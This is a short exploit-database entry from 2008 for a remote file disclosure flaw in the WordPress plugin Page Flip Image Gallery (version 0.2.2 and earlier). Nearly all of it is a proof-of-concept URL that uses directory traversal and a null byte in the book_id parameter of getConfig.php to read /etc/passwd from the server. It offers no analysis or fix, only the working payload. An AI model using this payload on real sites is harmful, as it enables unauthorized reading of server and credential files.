id: 4519
date: 12/22/2008
title: Wordpress Plugin Page Flip Image Gallery <= 0.2.2 Remote FD Vuln
author: GoLd_M
cves: 

================================================================
Wordpress Plugin Page Flip Image Gallery <= 0.2.2 Remote FD Vuln
================================================================


Wordpress Plugin Page Flip Image Gallery <= 0.2.2 Remote File Disclosure Vulnerability
D : http://downloads.wordpress.org/plugin/page-flip-image-gallery.0.2.2.zip
Poc : 
 /wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=../../../../../../../../../../../etc/passwd%00123



#  0day.today [2023-03-22]  #